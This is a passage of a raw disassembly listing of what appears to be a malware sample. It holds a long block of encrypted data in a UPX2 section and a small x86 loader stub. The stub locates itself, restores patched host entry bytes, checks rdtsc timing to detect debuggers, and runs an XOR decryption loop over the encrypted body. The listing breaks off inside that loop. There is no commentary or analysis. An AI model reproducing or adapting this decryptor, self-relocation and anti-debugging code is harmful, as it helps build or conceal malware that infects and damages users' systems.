0D3AE78F4h, 0AC261DFBh, 0E4919822h, 25A1BC00h, 0C00AF830h dd 0DAFAC714h, 0F4789CDFh, 0F26408A5h, 4A6EF93Eh, 13C61A86h dd 28B85C9Fh, 0F1A3C924h, 4BED3054h, 0AFDC6C80h, 0DD5108E6h dd 70DA548Ch, 80FC641Ch, 0A622AD04h, 8032B86Ch, 9516880Ah dd 0F8129D11h, 0F034ED3Ch, 0AA56AB71h, 0D022A12Bh, 9583AF74h dd 10BA33DEh, 2030DC15h, 30C628A4h, 0BFEF6FE4h, 66F06251h dd 0E451D3D4h, 1AEC5EF1h, 0EBE79BF4h, 785D85CDh, 0A01C9811h dd 0BA488D02h, 55C3EF34h, 0D07AF31Eh, 0B0501CD7h, 0F704E38Fh dd 8D7CF874h, 26929E39h, 0DFCF4F94h, 6900231h, 3E7CBDB4h dd 3879C590h, 0E3DC6EE8h, 46F9EC41h, 0D7178F4h, 903AB663h dd 0A076563Fh, 4F7FFE75h, 0F6009EA1h, 0D0B44B44h, 6BCDF72Ah dd 98D9659Ah, 0B07CCE48h, 6522FA89h, 37747884h, 5153D75Eh dd 495F2FC6h, 0BBCD3F49h, 4B13D33Eh, 1851E52Ah, 73FC4EC8h dd 7BFB0FA0h, 35E3CBADh, 0B01A943Eh, 0D55705B4h, 0A44DC872h dd 956CB07Eh, 6593E864h, 4AC3BEh, 2EEBB504h, 549C18A2h dd 5C29EFB5h, 40BC0EAAh, 96CC48C4h, 56E23F51h, 780568E4h dd 4703870Ah, 0A619FC81h, 0A01C9814h, 0B4EEF5A4h, 8F36B534h dd 0BF23A664h, 8633F83Ah, 96058444h, 4F5CD911h, 7DE57CA4h dd 4FE838F1h, 5CC94B84h, 21CE5AD1h, 5DED2DB0h, 40FC78DEh dd 50A348C4h, 0ED910D87h, 0F72CFA61h, 0C578EA75h, 0BA21894Ah dd 0A550DD66h, 0B520BC2Ah, 9930AB27h, 800D8044h, 615C8104h dd 75AC6CEAh, 43F968ECh, 44C249D0h, 34CF1898h, 39A826A5h dd 40E63FBAh, 27E665C9h, 0E89F0C95h, 0B06BE66Dh, 8070F475h dd 9055C940h, 0E058D655h, 0B82BA12Ah, 867CF420h, 964C9A0Bh dd 6E199106h, 59AC7BE0h, 49FD6FB4h, 3AA112D0h, 32D950E3h dd 22AD68A1h, 0FA578B1h, 16CC4491h, 0EE991186h, 0B033FB60h dd 0C571F757h, 0C4658805h, 0E04FD114h, 0B521A130h, 9415F875h dd 9C4C9B43h, 21198C15h, 204B8C80h, 6F486297h, 200A3C8Dh dd 8B6AFCh, 1C6EE96Ch, 0B2277Bh, 0B873A4E4h, 4290B4A8h dd 292EECD4h, 0BE7FDB34h, 0B02CA824h, 0C03CB834h, 0D04CC844h dd 0E05CD854h, 0F06CE864h, 7CF874h, 108C0884h, 209C1894h dd 30AC28A4h, 40BC38B4h, 50CC48C4h, 60DC58D4h, 70EC68E4h dd 80FC78F4h, 900C8804h, 0A01C9814h, 0B02CA824h, 0C03CB834h dd 0D04CC844h, 0E05CD854h, 0F06CE864h, 7CF874h, 0C4298BE4h dd 209C2EABh, 0F748D27h, 4FBC3882h, 0DDD80B73h, 0D7D34087h dd 0A0EF6EAFh, 0A4D83C7Fh, 0E200CA2Fh, 0A85EA30Dh, 0F2A7BC57h dd 0CC7E9320h, 0EF985DCDh, 65D5D862h, 0F05AD7BCh, 0C2FFFD9Fh dd 7155EAACh, 0A89C1C56h, 6884E21h, 40D8D0B4h, 70A448C4h dd 0EDDC58D4h, 46CFFB61h, 98C521F4h, 508F8470h, 5FEB7A10h dd 86131CA1h, 19CB7B34h, 0F42A4547h, 0F0BFD862h, 7F90989Bh dd 4947B74h, 8D05FE66h, 20AA3B07h, 44AC1227h, 438E13B1h dd 1E4158B6h, 3E870028h, 4EC5267h, 6BCE87F0h, 807E7707h dd 5FE3CFFCh, 9BE283DBh, 0F60360B9h, 9B4F9044h, 65D31B60h dd 0F05AD7DCh, 3FC87DB3h, 108C08B2h, 1C741894h, 0BBAC28A4h dd 76838C31h, 0A65AA0C4h, 7834A72Bh, 0F3EC68E4h, 0B6C3CC49h dd 98798804h, 8413059Dh, 2CC7A812h, 0FF8835CBh, 5F8FC872h dd 0D66360D1h, 44F96164h, 0E87CCE4Bh, 108C0887h, 0AB5FD1A7h dd 30ACA837h, 0AD546AB4h, 5333B73Ah, 56E38041h, 0F33A6BE4h dd 8FFC748Eh, 900D8F80h, 0B0661B14h, 4DA8A724h, 4B3CB834h dd 381CC406h, 1FA3269Ch, 0CFB46D67h, 0C67FF842h, 908482D4h dd 39E8186Dh, 4482D124h, 0B15778B7h, 0D1CD004Fh, 0BF038735h dd 3415E93Bh, 0F5FC34B8h, 5827D1E8h, 0AFE66197h, 0B02C1FABh dd 0B8BDDE34h, 0DF7EFBBAh, 0E05C73D1h, 0CAEFBE64h, 8B798D74h dd 126718CEh, 0D19F121Fh, 0CEDEC0F5h, 0F5BFC74Bh, 50FA771Ch dd 181CDD79h, 0F468671Fh, 7FFC78F4h, 0A63350B1h, 0F5F4C814h dd 0B3D357DAh, 0F60360B1h, 8C94744h, 0E35CEE6Bh, 733FCC60h dd 0DB4FFAB4h, 0F384BE8Bh, 559886h, 1488E9F7h, 64A011B0h dd 0BE844EDh, 0E135B394h, 0CB3B671Fh, 1C20C29h, 0FE4920FFh dd 212AECCFh, 1117F1DFh, 4112CCCBh, 656E1EBFh, 617AACF8h dd 0A8857B9Fh, 81628C87h, 4865757Fh, 0A18A6C67h, 15936E5Fh dd 0C1B24C55h, 75F3783Fh, 9FDA2C35h, 46D3D071h, 0F11523F4h dd 0CEF377FBh, 49085A97h, 4FD356CBh, 0C456BAF7h, 257A201Ch dd 75D427ABh, 0F05ACE24h, 184D4012h, 0F44CEA86h, 467E1A97h dd 68AA420Fh, 0BF49235Ch, 580ECB3Bh, 65B68953h, 85E280BCh dd 7A7C870Bh, 2007FB07h, 0E0999A44h, 1A2C9E02h, 0A8569FDFh dd 2ACC621Ch, 5044AD57h, 4820075h, 1C4078Bh, 948C0884h dd 0F1916C46h, 0DB66D644h, 0F8B9D342h, 0D0CC48C4h, 0A363BA7Fh dd 485CFD69h, 57D778C2h, 67CF52F3h, 96243D91h, 0B02CA824h dd 0A9B73Ch, 26472885h, 0D6647BD1h, 0F619E964h, 25F5F512h dd 957A1B6Fh, 20AA2037h, 56AA5DA6h, 0AB9909B9h, 51C12EC0h dd 88773EF1h, 8F139758h, 9C83B7Fh, 0A6334491h, 57DF3314h dd 86140DA1h, 0C03CB834h, 10D9C74Ch, 8F66450h, 0F9317F8h dd 3FAC6DFDh, 957A08B2h, 20AA2037h, 3FA85DA5h, 6BBED385h dd 0A70FE304h, 56E4FD51h, 70EC68E4h, 0ADB0CFCh, 0A6341781h dd 0ABFC5914h, 0F5A7A542h, 388C1352h, 4FC942EEh, 215CEE6Ch dd 9769F384h, 0AB7A7110h, 0BBEAC8B7h, 44240A7Fh, 9BAC2D2Bh dd 7823BD3Eh, 8C848F2h, 0CBC4B815h, 9B10D827h, 6B441ED4h dd 7BA7EE04h, 0F818F20Dh, 4FDF57CCh, 123835CBh, 0B6442885h dd 869C5151h, 406F03CFh, 21652E4h, 0E36AE0DCh, 0F218E76Bh dd 38C61AD0h, 0B366D0ECh, 9A32B73Bh, 0A5A89BA6h, 0B998A21Ah dd 5B88B20Ah, 9C7842FAh, 0AC6852EAh, 0BC5862DAh, 0DD74184h dd 19A735F4h, 25B72DE4h, 318710D4h, 0B0C175B7h, 0E78C3EBCh dd 16A4BD11h, 30AC28A4h, 0F0BF4C34h, 0D53BE2A4h, 60EA6071h dd 78EC68E4h, 0D5447F80h, 3B0C648Fh, 5996F5Bh, 0B32C9E1Ch dd 0CF3DB834h, 0D04C1FC0h, 4AB46854h, 4CD161CFh, 0B07CCE4Bh dd 9927A26Ch, 16A3D829h, 9529DFA4h, 43BC0E8Ch, 24CC48C4h dd 0C559AFC1h, 70EC5EDCh, 0F4FD78F4h, 6ECD6001h, 49AC67EBh dd 35A7038Eh, 0C00A8788h, 186707CFh, 0DF9865DDh, 0B8E5E852h dd 641B4088h, 23273E7Bh, 0D7377E54h, 6948D21h, 40BC3BB4h dd 0A6C23CC4h, 56E4FB51h, 7598E8E4h, 7F023A1Ch, 0F46B30FBh dd 93B7BE9Dh, 4787CEE4h, 0F6041DB1h, 0D04CCB44h, 1609AC54h dd 0C6544BE1h, 5097874h, 0EF72166Ch, 0DD38F06Bh, 101CD75Bh dd 0BF478E5Ch, 36F5AB3Bh, 6C9A76Ch, 0FB47F94Fh, 0B6C4DD61h dd 67DE7F04h, 0A01C9BD6h, 5838DD24h, 3FC3454Ah, 40A4D7F4h dd 86A327AFh, 967917DCh, 8BD769DFh, 0D409834Bh, 0B9C2EABh dd 0CCE4A16Ch, 7819BD43h dd 50CF48F2h, 4EA858D4h, 4849ED13h, 80FC78C2h, 0B2788E04h dd 98B91DE3h, 0B02CA812h, 0C549B934h, 2FB13AACh, 45D92FABh dd 0F06CDE5Ch, 7478F874h, 0EE81E081h, 0A56BE76Bh, 309A1001h dd 40BC38B0h, 37245FB0h, 0D823A72Ah, 0B812A8CDh, 40F4C05Fh dd 28A78C70h, 0C7F76061h, 15A95F8Fh, 0C83C8E0Ch, 0A54CC844h dd 43E1581Bh, 0F06CDE5Ch, 3B94BE00h, 0A873F77Ah, 0E9B500BDh dd 8338DAEh, 0A47C3882h, 0CF6942C7h, 0CBDC6EECh, 0FA46D954h dd 0B6C4DB71h, 0D0BC2204h, 98831D1Eh, 0D686A812h, 37C15A8Ch dd 0E6746DC1h, 0E05CC854h, 406B9C64h, 0B81A523Dh, 0BBEAF4F1h dd 1336F024h, 8D258364h, 408A071Ch, 6869CD33h, 60FC58E2h dd 799968E4h, 5F62044h, 903AB099h, 21A4FEBEh, 15A95FE4h dd 803C8E0Ch, 0A44CC844h, 0C8985857h, 0C8F14D6Eh, 0AB1AF842h dd 2F20B50Dh, 0D73718A2h, 6948D21h, 40BC38B4h, 0E0C53D84h dd 0FD595A84h, 0DAEC5EDCh, 0B859FD03h, 908C8832h, 0AB699814h dd 35261094h, 0C00A80AAh, 0B67123EEh, 1744E9ECh, 0C6544DE1h dd 7DF874h, 0A08E7C84h, 0BE3912BDh, 0F0AC1E9Ch, 0E5B63B50h dd 50FA705Ah, 0D8BAF3B2h, 0F51B9865h, 80CA4051h, 900C8A04h dd 68A89A61h, 88B20D2Eh, 6B5AB802h, 0EF8475CDh, 50E4D862h dd 5B6CE84Ch, 38D97D83h, 108408B2h, 51E81894h, 0CF51194Ch dd 0E539CF4Bh, 50CC7EFCh, 15DC58D0h, 7A54D8EFh, 0B6C4E771h dd 0DDE72204h, 98B91DE3h, 0B82CA812h, 0D149B834h, 30CF7022h dd 0D8C37D5Eh, 5B0AE852h, 0EBD63847h, 39346E91h, 0BF39128Ch dd 0F0AC1E9Ch, 0E5B63B50h, 50FA705Bh, 0E52BF3B2h, 70DA5041h dd 80FC68F4h, 508D3062h, 649C9B60h, 2F89A22Ch, 0A63C8E0Ch dd 55FAC7EFh, 0E06AE0F7h, 0CAC00CFh, 858B078Bh, 10BA3021h dd 609C1894h, 601C21D0h, 7821BDB6h, 0A76648F2h, 56E4FD51h dd 70CC68E4h, 0F57AC8F4h, 1D088C06h, 596665Bh, 0B01A90B9h dd 0FF8C35BDh, 7B2AC872h, 955924D4h, 706C5863h, 0AA3C073Bh dd 0EF70716Ch, 8519EF6Bh, 30AC1E9Ch, 26BC38F4h, 25FD2E7Ch dd 6F5ECD6h, 7AF4D84Fh, 0B6C4E771h, 93EC4804h, 5C4870BEh dd 389C57DBh, 0F8993DC3h, 504CC872h, 0E229D854h, 55E66ED4h dd 4AC0E9h, 0EC0CA3E2h, 909B6D91h, 0CFE3A8A4h, 6B5492F4h dd 0A733B738h, 56E4FD51h, 71EC68E4h, 30F70DF4h, 0D898244h dd 0A1CAE2Ch, 84AA7CFh, 653678B7h, 0D07AF0D9h, 0E1EC7332h dd 55E91FCEh, 7CCE4Ch, 658C0A84h, 8519EFBBh, 30AC1E9Ch dd 35BC3CB4h, 5A0CF8DEh, 56E4C751h, 0D449E2E4h, 41FC4ECCh dd 286A98E4h, 10B71972h, 244324h, 5FB9B274h, 7A4CFE7Ch dd 0D8F95DA3h, 0F06CE852h, 1009F87Ch, 0F80FB0E2h, 1802BD9Eh dd 9BCA2892h, 48573904h, 0D5C60074h, 60EA604Ah, 0D5699F4Eh dd 80FC4ECCh, 210C9804h, 0C639ED61h, 0BAD42B9Ch, 0F6042691h dd 0E3E7AE44h, 5D757294h, 0F05AD7D4h, 38D97D83h, 108C08B2h dd 3FE918B4h, 2B475F15h, 58B580D2h, 6852EDCEh, 841C58E2h dd 0EE4962E7h, 0E6FC4ECCh, 20B1A1AFh, 2A1CAE2Bh, 8922E5h dd 0A63C8E0Bh, 0D21478EFh, 0D66445D1h, 759B4264h, 4AC0D1h dd 118C0887h, 0A56B3AE0h, 309A1001h, 44BC38B4h, 0D53B5EB1h dd 60EA6071h, 73EC68E4h, 4147D81h, 78F377FEh, 5FE362BFh dd 88892DD3h, 0C03CB802h, 0D338C044h, 17F611E4h, 0C6544DE1h dd 7CF874h, 0A0AC7C04h, 0BD193293h, 0F1AC1E9Ch, 0C9B12254h dd 52CC6CCCh, 56E4C571h, 7308A8E4h, 2BF8BC74h, 0F6A6E9B4h dd 0AAFC67ACh, 86143581h, 3797DE34h, 0E6746DC1h, 0E05CF854h dd 73F9C64h, 36445DF1h, 108C0884h, 0D7916CB4h, 30AC2B63h dd 0F0B94CB4h, 0A327E254h, 0ED579F5Fh, 70DA574Ch, 0C175B9DFh dd 9A5438F8h, 96240591h, 35DB0224h, 0C00A8091h, 0D00CC844h dd 583AD420h, 75662B34h, 4AC0E9h, 0A8EA026Fh, 8596F86Bh dd 309A1039h, 0C54B93D2h, 50FA7061h, 61DC58D7h, 0F51B1B90h dd 80CA4051h, 0B00C8804h, 67EB9560h, 0B02CA827h, 508CBD40h dd 5BBF23EEh, 20D9539Bh, 0DB6CDE5Bh, 0FC3471BCh, 957BC1B7h dd 20AA2031h, 302C28A4h, 0C53136C1h, 50FA7059h, 0E09C505Eh dd 889F6B1Dh, 0C4317C79h, 510C9820h, 2BAC90F4h, 0D62A4B8Fh dd 0A6FC898Ch, 5FF4AEEFh, 0E0E4B0D4h, 116EE864h, 0AB245312h dd 16F9C101h, 0E0ADA0F2h, 0F31C83C2h, 0F039B51Eh, 0A7CC7EFCh dd 56E4FD51h, 70EC68E4h, 0D7FA0DE4h, 7B54702Fh, 884F130Dh dd 6007500Fh, 0FFF435BFh, 454DC872h, 0E06AE7FCh, 0B4E7D165h dd 0BDF5FC50h, 10BA18E3h, 1F30A51Fh, 0B5872892h, 408A071Ch dd 6869CD33h, 609C58E2h, 729868E4h, 4257A003h, 0C75A8800h dd 9FFC2597h, 0BF2CA812h, 0C03D61B0h, 0D0412044h, 0A517D854h dd 0BC29A636h, 4452CA47h, 0EF8C44C8h, 16A78A01h, 0C429A1A4h dd 13BC0E8Bh, 53F0104Fh, 48AFA70Ch, 98D82B6Fh, 7F038D14h dd 0AFD81D8Fh, 0A3479822h, 35A5A466h, 0C00A87CCh, 59448A47h dd 0D66324D1h, 0D81F6364h, 0FC4B8Bh, 0A9640884h, 0AB63E761h dd 693FC19h, 0ED546EB4h, 0DB33B731h, 56E38C41h, 78A6E3E4h dd 0ABF032F7h, 95E50BCAh, 0A17C101Bh, 3423A824h, 0C03CB96Eh dd 0EF947D47h, 555FD862h, 0F05AD7FCh, 0F94C4D8h, 108CAA01h dd 24DA9594h, 0F34AD8Fh, 46BF3882h, 0A5A6A094h, 0DD5FA72Bh dd 70DA5730h, 0BBF70DF4h, 13038443h, 0A01C990Fh, 2515A4CFh dd 0C00A87E0h, 0D1414D4Bh, 655FD854h, 0F05AD7FCh, 0FF447912h dd 0EC0907A1h, 0AB9C1894h, 73872AE4h, 6D546880h, 6933B731h dd 56E38C69h, 946967E4h, 83FC78F4h, 0A6335081h, 38999B14h dd 3B2C9E1Bh, 0CC7B9334h, 0D0814A4Bh, 0A767D854h, 34EFE76Ch dd 837CF874h, 578F0A44h, 0B8191B80h, 62AC1E9Bh, 0B409C7E4h dd 0AFCC7EFBh, 56E70A41h, 0B06932E4h, 804BFDFBh, 0CE58804h dd 9C1C9814h, 24A9A7DBh, 403CB834h, 5543DD7Ah, 0E05CD8DFh dd 0DB6DAEEFh, 0E82CCC37h, 0EF73FC38h, 1F48A5ADh, 47D92892h dd 7F64BDB7h, 0D5CF48F2h, 60EA674Ch, 30ECED6Dh, 807778C2h dd 0AFF40D3Fh, 0A86E9822h, 8FD02D1Fh, 0A94EB802h, 0D04CC879h dd 86BAA24h, 0F06CE87Bh, 8B80B6F9h, 138E2345h, 0A5A708D6h dd 309A68A4h, 843F34C1h, 0DFFDB7D4h, 1C07C90h, 0FF2F730Fh dd 0B6C3C071h, 2587E804h, 0A02AA78Ch, 4FD9F2CCh, 0C095D9CBh dd 0A5CCC844h, 0EC1BF35Ah, 0B757E116h, 3CFEF77Ch, 5973F77Bh dd 0DE2E9D9Bh, 0C27D75Bh, 0E51BB990h, 0AFCC48ECh, 8BA3A72Bh dd 54A6E9A6h, 60FC7894h, 1BCCBB4Ah, 259BBC18h, 0B01A97C4h dd 0FFE03DBDh, 69C1C872h, 0E05CF0FDh, 0CFF46D67h, 0A51AF842h dd 0D6A74621h, 0B885A97h, 766A24E6h, 0C17BD04Fh, 50CC4896h dd 60DC58D1h, 2F102E6Dh, 7FABBBAAh, 0A6371691h, 0BFF45914h dd 0B1362D2Bh, 946CB834h, 2F26E02Eh, 0DBA24DABh, 30E9E852h dd 5F4F72Bh, 0F88C0885h, 0DF63FDD4h, 30AC394Ch, 34D96BB4h dd 35A02182h, 15BF3D87h, 9980196h, 350378B5h, 903AB768h dd 9B4E0DEBh, 35A5A812h, 0C00A8740h, 0D04CD1ACh, 0B4398B54h dd 0BF098305h, 72199603h, 60E560F7h, 56F56AC4h, 57C944CDh dd 0A8EB38D1h, 0AF33A1D5h, 60DC4B3Ch, 22893BE4h, 0EF880B91h dd 0E25CED76h, 0CC75EE7Dh, 0B049CF41h, 28CF5063h, 0C2A437BBh dd 0B35CD854h, 930DAA01h, 500C8D1Fh, 79FA61F6h, 45FB7DF8h dd 0E6447FA4h, 0A843C75Ch dd 50CC48DCh, 89F3D87h, 158B0685h, 0E98817BAh, 0E25CF162h dd 0CC75EE7Dh, 0B049CF41h, 288F5063h, 841C37BBh, 0DAEC5DD9h dd 9406E852h, 577D9224h, 2C869D7Bh, 1C1518A2h, 7639D780h dd 6ABC0E8Fh, 3871C504h, 30DC6EEAh, 0C51338B4h, 80CA4244h dd 940C896Ch, 0A176CC14h, 0C4B95773h, 943C8E0Bh, 2F1BCC2Eh dd 0D663ACC1h, 0E4A86B64h, 3F104D8Bh, 857308B2h, 20AA2316h dd 8521EBFBh, 408A06DCh, 0D659B792h, 0E3DC6EEFh, 0F4E3971Ch dd 80FC784Fh, 0AF740D8Dh, 0A0769822h, 72B95772h, 453C8E0Fh dd 74C8C784h, 0CB5CD854h, 9A3CB8A4h, 116A877h, 108C08ECh dd 0B5634E54h, 309A13C6h, 4F43C037h, 50C9A040h, 1C59D1D4h dd 0FDEC5EDBh, 0B6C3F879h, 18990504h, 0F11CAE2Bh, 0E02CC276h dd 0FBB22DCBh, 28CFC872h, 56D8D7ABh, 9A6CE861h, 7CC90774h dd 0EF8C3EBBh, 16A79201h, 0CF54ABA4h, 4523BCBBh, 0D54548C4h dd 60EA6744h, 0B3EFA1D7h, 0EAAD28A5h, 25F3D900h, 0A02AA768h dd 8B4A3DDBh, 0B9B802h, 0D5374C4Bh, 296FD854h, 0CFF86DEDh dd 512DF842h, 109360D5h, 0DFCC189Bh, 6978631h, 4F7CBDB4h dd 50C97C40h, 0F859D1D4h, 0B3EC5EDBh, 808C704Ch, 0A8470304h dd 98B91DE3h, 0B02CA812h, 0C649A834h, 0C02B4D47h, 326FD862h dd 19B2967h, 85F51983h, 10BA3720h, 20B4B72Ch, 0CE7A3A4h dd 50DBBDB7h, 82FF48F2h, 912B99D7h, 0F5658913h, 80CA4768h dd 0DBBB87C7h, 95FF6112h, 0BF34FBA9h, 0C328FB83h, 11278194h dd 618CDB7Ch, 991BB75Eh, 1D08011Ah, 11807207h, 6B17F8E6h dd 24EEA398h, 0CDAC7AB7h, 0A7330080h, 5B1D7B0Dh, 46D3F861h dd 0D477BBF4h, 503F9820h, 0A0A41A9Bh, 3BEFA824h, 4D3753FBh dd 0E672A0F9h, 3FD72454h, 0CCC02157h, 3C7A8A15h, 3C8E7FFEh dd 7CA0B2B4h, 1E90C4D0h, 4080E5C0h, 992FA0B1h, 25E1595Fh dd 4EC2DBCh, 0C3AF45FFh, 15038856h, 5FE36727h, 0E711ABAFh dd 0CF7FF67Dh, 2FB3EEC0h, 0A30BE5ABh, 7463A631h, 0FF83076Fh dd 23CF5FB9h, 301817A6h, 0D53D75Bh, 0FE86BE4h, 0AFC9CCCBh dd 0BBEFA72Bh, 8F12450Ch, 68EC0D0Bh, 6FF374FEh, 5FE2B9FCh dd 5CA8A7DBh, 0F3C347CAh, 0D05A2096h, 83B4D854h, 1893179Bh dd 7CF874h, 436189D9h, 0C99C2EA7h, 30AC2B7Fh, 0CB8EC7D0h dd 66F3D071h, 42553CD4h, 3DD2E982h, 447977AEh, 1B0C8807h dd 7E1FA44Ah, 0E0172942h, 74B9B771h, 274CC847h, 0C05CCE17h dd 7563E864h, 7CFBD3h, 12D04B72h, 23019C9Bh, 732728A4h dd 0E01C05BCh, 0D4C3E864h, 60DC5B5Bh, 50CC48D9h, 47877D4h dd 780C8807h, 5FE366ADh, 0B3552A2Bh, 65BFB834h, 0D07AF798h dd 0E81E5354h, 0DB7CA2EFh, 33788BB5h, 1389E344h, 30D6915Ch dd 0F0CAD2Dh, 0ABF3882h, 50CCF0C8h, 888D58D5h, 8F138F74h dd 0B85FEDC4h, 0B0BD8832h, 98B82D24h, 9046A812h, 0B86471CAh dd 373A2050h, 32D927ABh, 23AE7C6Bh, 0A5E9C996h, 0FB8C3EBCh dd 8519EF71h, 30AC1E9Ch, 34BD38B4h, 0F549BFE6h, 63DC6EECh dd 5EC68E4h, 2559F9F8h, 6F0CBE3Ch, 4BE767EBh, 15A1292Eh dd 0C03C8E0Ch, 0B844C844h, 0E05CD852h, 0F06A803Dh, 0E824F874h dd 0EF73EFACh, 18019D1Eh, 0B42A2892h, 7684A59Eh, 0CD49C0C4h dd 82DC6EECh, 0D5699F04h, 88FC4ECCh, 0E50C8804h, 3FA1181Dh dd 0B12C9E1Ch, 45CB7D40h, 0D07AF0E1h, 0E85CD854h, 4DECF310h dd 4AC0E9h, 903C7C81h, 16A48629h, 97D82DA4h, 78238534h dd 24C948F2h, 0C559AF4Ah, 70EC5EDCh, 0F47C78F4h, 0DB1080Dh dd 0A21CAE2Ch, 15AF2153h, 0C00A87D4h, 234B2044h, 81B427ABh dd 18931799h, 7CFA04h, 2F10950Fh, 0BD9F18A2h, 309A1704h dd 0BF40415Ch, 48473Bh, 0EBDC58D6h, 46D3F051h, 0BCA2F3F4h dd 0EAE45607h, 0AFE367E9h, 0B02E92A6h, 0E4763934h, 304CC824h dd 0B60E26DFh, 0F3789267h, 858BE80Eh, 10BA3021h, 309C1894h dd 8D253CD1h, 408A0750h, 687CFD49h, 0ED5758E2h, 70DA7883h dd 39ABDC07h, 900C8228h, 0B01C2D99h, 15DFA812h, 0C2DFB885h dd 55BB6CB7h, 0E06AE0F1h, 0E06CE864h, 0D27C7Bh, 63730884h dd 0CE2AF0BCh, 0A527D75Bh, 408A0760h, 0D4C39A41h, 60DC584Ch dd 4F74DD6Fh, 0CA7778C2h, 0B4460914h, 401C9874h, 0C324E20Fh dd 0C3F58B36h, 5D77DC36h, 0E06AC833h, 0E00B65EFh, 560EF842h dd 93A8340Fh, 168C7F31h, 972F28A4h, 40BC38D3h, 58B6C3C4h dd 63D412D5h, 0FB1BEF13h, 0B6C3D471h, 35897F04h, 0E01CAE2Ch dd 0C42CA824h, 0C3244F36h, 0E065C436h, 0DFBC6DDDh, 83E7E852h dd 0F74CF95Ch, 26B4AD01h, 209C5894h, 0C7AE5CA4h, 95469ACh dd 933B738h, 13DF543Fh, 7C9E43CCh, 240F2EA5h, 2581D15Bh dd 0A02AA0A4h, 8FC815ADh, 64CFB802h, 0E143961Bh, 33DB55C6h dd 0CA6CE864h, 36445BE1h, 798A7D84h, 14CA6046h, 0C0FCA0B6h dd 0BF66985Ch, 1A47123Bh, 70965BD8h, 4849ED13h, 80FC78C2h dd 0D1819804h, 290FED11h, 861348A9h, 0A7B9BB34h, 534CFE54h dd 0E05CBFF3h, 0B347E864h, 52FB715Ch, 0E78C0884h, 16A07811h dd 30AC29A4h, 87BB4CB4h, 0F06C4087h, 0E52BF874h, 70DA5041h dd 0FC78F4h, 785E8F70h, 5FE36F6Eh, 50A1237Eh, 233C8E0Bh dd 0F8074141h, 6DD7D5BFh, 0F05AD7B8h, 397FA97h, 0E7A4430Fh dd 16A4BD11h, 30AC2BA4h, 0CBA84CB4h, 66F3AC41h, 0B0515BD4h dd 73EC5EDBh, 0B6C3B471h, 1B048904h, 2597885Eh, 0B01A97B8h dd 0B334F20Dh, 0D8064147h, 634C9A55h, 7B6CB007h, 36435CF1h dd 383C6084h, 629D1894h, 73AD71ACh, 0E329B2E4h, 0A7CC7EFCh dd 56E4FD51h, 70EC68E4h, 83FA0CE4h, 0A61CEF89h, 571C2E14h dd 86140DA1h, 0C23CB834h, 2E58BD44h, 45D92F92h, 0F06CDE5Ch dd 757CFC74h, 0B4398282h, 0D79C2EACh, 6948D21h, 40FC38B4h dd 0DAC73DC4h, 0CA1E5AD3h, 870EBEE6h, 8776711Fh, 92A64A36h dd 93EB7AC2h, 92A7CCF6h, 983E3750h, 0EF3075C7h, 0EF5CD862h dd 0F9636E0h, 98C9078Bh, 0EF8C3EBBh, 16A7CA01h, 0A419D7A4h dd 0BFBC0E8Bh, 66F70E51h, 0E051D5D4h, 0FDEC5EDBh, 0B6C3F061h dd 0FA5ED904h, 0DCA96714h, 4F2C9E1Bh, 0F6077EA1h, 0ACF93744h dd 1F5CEE6Bh, 0C657AEF1h, 68C97574h, 0EF8C3EBAh, 16A36021h dd 0A5537EA4h, 408A0376h, 6FB0ED47h, 0A3DC58E2h, 70EC680Ch dd 819625F4h, 0A7BC6585h, 50449822h, 0C4A9692Bh, 453C8E21h dd 18CF0B84h, 215328ABh, 0C6799CE1h, 10413B74h, 658C2284h dd 5C1D7E88h, 41C02480h, 0A8DC2BC1h, 0AF33B700h, 0B4345DA1h dd 9813971Eh, 7F038726h, 0BDF3A665h, 0B228CE6Ch, 0B02C8D9Ch dd 65D4D834h, 0A5B337BBh, 0C418536Dh, 98D96554h, 8B7CCE4Ah dd 91EA00D4h, 539E1EAEh, 30C47E81h, 0CBBCC7B4h, 2CC2200h dd 7249A784h, 0F3EC5ED8h, 0BE7D7030h, 0CC33B758h, 669F9B61h dd 4AAD4020h, 0BFD447CBh, 0B1B337BBh, 0E0286097h, 4187E864h dd 7CD7CCh, 1091E084h, 5E1894h, 309C90A4h, 505438B4h, 92CC48C4h dd 0E56458F0h, 98EC68E5h, 80FC78F7h, 1D0CA4C6h, 6D10BC40h dd 0B0D42B0Ah, 285CA148h, 0D04CC844h, 0D0788CDFh, 71766339h dd 36447F99h, 0F136E084h, 0E2FDE76Bh, 33AD28A0h, 46BB3AB1h dd 72DE4D1Dh, 15FFE27Dh, 3143808Ch, 90h, 1CDh dup(0) dd 816FD700h, 44C96D7Ch, 43A0BD31h, 31h, 13DAh dup(0) ; --------------------------------------------------------------------------- loc_3144A000: ; DATA XREF: UPX2:3144CFE8o call $+5 mov eax, [esp] cld mov [eax+2FE3h], ebx test dword ptr [eax+28A0h], 80000000h mov ebx, [esp+4] jz short loc_3144A04B pop ecx mov [eax+2FE7h], esi mov [eax+2FEBh], edi cmp byte ptr [eax+28A4h], 0E8h jnz short loc_3144A042 add ebx, [eax+28A5h] mov ebx, [ebx+2] push dword ptr [ebx] jmp short loc_3144A04A ; --------------------------------------------------------------------------- loc_3144A042: ; CODE XREF: UPX2:3144A033j mov ebx, [eax+28A6h] push dword ptr [ebx] loc_3144A04A: ; CODE XREF: UPX2:3144A040j pop ebx loc_3144A04B: ; CODE XREF: UPX2:3144A01Dj push ebp mov ebp, eax sub dword ptr [esp+4], 10005h sub ebp, 361005h mov edi, [esp+4] lea esi, [ebp+3638B0h] mov ecx, 0BDh rep movsb call sub_3144A0C0 mov ecx, eax call sub_3144A0C0 sub eax, ecx jz short loc_3144A094 cmp eax, 100h ja short loc_3144A094 lea eax, [ebp+3610D3h] mov dl, [eax-10h] call sub_3144A0C4 jmp short near ptr byte_3144A0D3 ; --------------------------------------------------------------------------- loc_3144A094: ; CODE XREF: UPX2:3144A07Bj ; UPX2:3144A082j test dword ptr [ebp+3638A5h], 80000000h jz short loc_3144A0BE lea esi, [ebp+3638A9h] mov edi, [esp+4] movsb movsd mov esi, [ebp+363FECh] mov edi, [ebp+363FF0h] mov ebx, [ebp+363FE8h] loc_3144A0BE: ; CODE XREF: UPX2:3144A09Ej pop ebp retn ; =============== S U B R O U T I N E ======================================= sub_3144A0C0 proc near ; CODE XREF: UPX2:3144A06Dp ; UPX2:3144A074p rdtsc retn sub_3144A0C0 endp ; --------------------------------------------------------------------------- db 8Eh ; =============== S U B R O U T I N E ======================================= sub_3144A0C4 proc near ; CODE XREF: UPX2:3144A08Dp mov dh, dl mov ecx, 27D2h loc_3144A0CB: ; CODE XREF: sub_3144A0C4+Cj xor [eax], dl inc eax add dl, dh loop 